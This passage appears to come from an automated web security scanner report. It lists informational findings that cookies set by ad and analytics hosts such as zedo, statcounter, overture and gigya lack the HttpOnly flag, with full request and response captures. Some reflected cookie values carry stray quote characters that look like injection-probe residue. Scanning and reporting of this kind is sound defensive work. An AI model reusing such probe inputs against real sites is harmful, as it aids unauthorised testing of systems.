Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 466
Content-Type: text/javascript
Set-Cookie: aria_guid=1315831727-217; expires=Thu, 09 Sep 2021 12:48:47 GMT;path=/
ETag: "6fadfe0bc7ebeb328cca25f9535bd0f5:1296687166"
P3P: CP: IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT
Vary: Accept-Encoding
Cache-Control: max-age=4866
Date: Mon, 12 Sep 2011 12:48:47 GMT
Connection: close


                                   var guid_domain = location.hostname;
   var guid_domain_parts = guid_domain.split(".");
   if(guid_domain_parts.length>2)guid_domain = guid_domain_parts[guid_domain_parts.length-2]+"."+
...[SNIP]...
5.14. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=594085&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.popsugar.com/community/welcome&t=Welcome&java=1&security=defbf778&sc_random=0.8725620578043163&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831680.0; expires=Sat, 10-Sep-2016 12:48:00 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;
5.15. http://c13.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c13.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1345764&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.nowpublic.com/&t=NowPublic.com%20%7C%20The%20News%20is%20NowPublic&java=1&security=26324a10&sc_random=0.533788861008361 HTTP/1.1
Host: c13.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315831702.0; expires=Sat, 10-Sep-2016 12:48:22 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;
5.16. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:31 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:31 GMT
Content-Length: 7450
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...
5.17. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=14&q=&$=&s=2&z=0.5840262724086642 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0; PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1a0a560b687152eaa6ee3ef9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:1545,8,0:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:29:27:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236|1,1#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:53 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=165
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:48:53 GMT
Content-Length: 4602
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1a0a560b687
...[SNIP]...
5.18. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7040/7039/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1638&z=0.628017297713086 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 507
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7040,15:305,7038,15:305,7038,0:0,7038,15:305,0,15:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:29:1:1:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7040,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=146
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1638;var zzPat='1a0a56
...[SNIP]...
5.19. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 407
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:305,0,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...
5.20. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.3701211323495954 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=3:3:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2470080B826,110235|0,1#0,24;expires=Wed, 12 Oct 2011 13:03:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:3:3:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 12 Sep 2011 13:06:33 GMT
Date: Mon, 12 Sep 2011 13:03:56 GMT
Content-Length: 4557
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCust
...[SNIP]...
5.21. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 420
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=85
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:38 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='5406e''
...[SNIP]...
5.22. http://c7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1201513Za1013066Zc305007038%2C305007038Zs608Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6687
Date: Mon, 12 Sep 2011 12:48:33 GMT
Connection: close


5.23. http://cm.npc-morris.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF0dXZ2cAN%2bpN%2bAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:41 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
5.24. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counters.gigya.com
Path:   /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif HTTP/1.1
Host: counters.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ucid=RFq8Ln1vPSaBPMmq4LEJ0w==; _mkto_trk=id:672-YBF-078&token:_mch-gigya.com-1314893715569-60156; __utma=246645010.642220752.1314893716.1314893716.1314893716.1; __utmz=246645010.1314893716.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 12:48:08 GMT
Server: Microsoft-IIS/6.0
